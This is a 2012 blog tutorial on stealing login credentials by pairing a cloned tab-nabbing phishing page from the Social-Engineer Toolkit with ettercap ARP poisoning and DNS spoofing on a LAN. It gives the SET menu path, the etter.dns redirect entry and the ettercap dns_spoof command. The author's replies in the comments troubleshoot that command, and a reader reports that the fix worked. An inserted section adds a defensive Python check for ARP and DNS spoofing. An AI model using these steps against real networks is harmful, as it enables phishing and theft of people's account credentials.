Saturday, 22 September 2012

Tab-nabbing with DNS Spoofing using Backtrack


Please visit my new blog for updates: http://aakarperiwal.com


Hello everyone, I am going to show you how to use tab-nabbing together with DNS spoofing to make it more effective.

First, what is tab-nabbing?
Tab-nabbing is an advanced form of phishing attack. The tab-nabbing attack method is used when a victim has multiple tabs open. When the user clicks on the link, he/she gets a page saying "Please wait while the page loads" (this depends on your coding, but if you are using SET you don't have to do any coding). When the victim switches tabs, the website detects that a different tab is open and rewrites itself with the page you specify. When the victim clicks back on the tab, he/she sees a login page and thinks they may have been logged out. When the credentials are entered, the attacker gets them and the victim is forwarded to the real website.

When you are using it over a WAN you have to send the victim a link to your website. On a LAN the victim still has to hit your web server, so we use DNS spoofing: the victim lands on our web server and our tab-nabbing page opens.


First we will start tab-nabbing, then we will start DNS spoofing.

Before starting the attack, check your IP address using the ifconfig command.

Start SET (Social-Engineer Toolkit)
Give the following commands:
# cd /pentest/exploits/set/
# ./set
Now select the right options:
hit 1 (Social Engineering Attack)
hit 2 (Web site attack Vector)
hit 4 (tab-nabbing attack method)
hit 2 (site cloner)

Give your IP address and then the URL of the website.

Now that tab-nabbing is running, we move on to DNS spoofing (using ettercap).

Step 1: Install ettercap (as root)
# apt-get -y install ettercap

Step 2: Enable IP forwarding
# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3: Locate the etter.dns file
You may find more than one etter.dns; select the one I have selected in the picture.
# locate etter.dns

Step 4: Open the file and add an entry at the end of it
# nano /usr/local/share/ettercap/etter.dns
The entry to add at the end of the file:
www.url-of-website-to-hack.com            A   your ip address

Step 5: Start the spoofing
# ettercap -T -q -M arp:remote -P dns_spoof //

Now whenever the victim types the URL (facebook.com in this case), he/she is redirected to the attacker's machine and the attacker gets all the credentials.
I have also uploaded a video tutorial of this attack. Check it out.
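
Seen from the defending side, the setup above leaves two traces on an affected LAN host: the gateway and another local address share one MAC in the neighbour table, and a public hostname resolves to that local address. The following check is an added example, not part of the original post; the sample data is constructed and the function names are hypothetical.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: `ip neigh` output on a LAN host while its ARP cache is poisoned.
NEIGH_SAMPLE = """\
192.168.1.1 dev eth0 lladdr 02:00:00:aa:bb:cc REACHABLE
192.168.1.50 dev eth0 lladdr 02:00:00:aa:bb:cc REACHABLE
192.168.1.23 dev eth0 lladdr 02:00:00:11:22:33 STALE
192.168.1.77 dev eth0  FAILED
"""
# Constructed sample: (queried name, returned A record) pairs from a resolver log.
DNS_SAMPLE = [("www.example.com", "192.168.1.50"), ("www.example.org", "93.184.216.34")]

NEIGH_RE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9a-f]{2}(?::[0-9a-f]{2}){5})\b", re.I)

def parse_neigh(text):
    """Return {ip: mac} from `ip neigh` output; entries without a MAC are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def shared_macs(table):
    """Return {mac: [ips]} for every MAC claimed by more than one IP address."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def suspicious_answers(dns_pairs, table, gateway):
    """Flag names answered with a private address that shares the gateway's MAC."""
    gw_mac = table.get(gateway)
    hits = []
    for name, addr in dns_pairs:
        if gw_mac is None or not ipaddress.ip_address(addr).is_private:
            continue  # public answers and unknown gateways are out of scope here
        if addr != gateway and table.get(addr) == gw_mac:
            hits.append((name, addr, gw_mac))
    return hits

if __name__ == "__main__":
    neigh = parse_neigh(NEIGH_SAMPLE)
    print("MACs shared by several IPs:", shared_macs(neigh))
    for name, addr, mac in suspicious_answers(DNS_SAMPLE, neigh, "192.168.1.1"):
        print(f"{name} -> {addr} (same MAC as gateway: {mac})")
```

A shared MAC can also be legitimate (a router with several addresses, interface aliases), so treat a hit as a lead to verify against switch or DHCP records.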

3 comments:

zeeshaan zakariya said...

FATAL: ARP poisoning needs a non empty hosts list.


This shows when I start listening through ettercap.

Aakar Periwal said...

Well, I suggest you check your IP address and the mask you have. The demo I have shown was done on a LAN with a 24-bit mask (i.e. 255.255.255.0); if you are getting a 32-bit mask (i.e. 255.255.255.255) then you have to manually add hosts in ettercap.

You can use the command
ettercap -G
to use ettercap in GUI mode.

Or maybe you are using a different interface in ettercap, which may cause that error. If this is the case then add
-i interface_name
to the command, e.g.
ettercap -i eth0 ......
(... means the rest of the command)
To get the name of the interface, use ifconfig.

Гендальф Белый said...

I have a similar problem, and this post helped me, thanks) I just needed to replace eth0 with wlan0 and all is fine ;)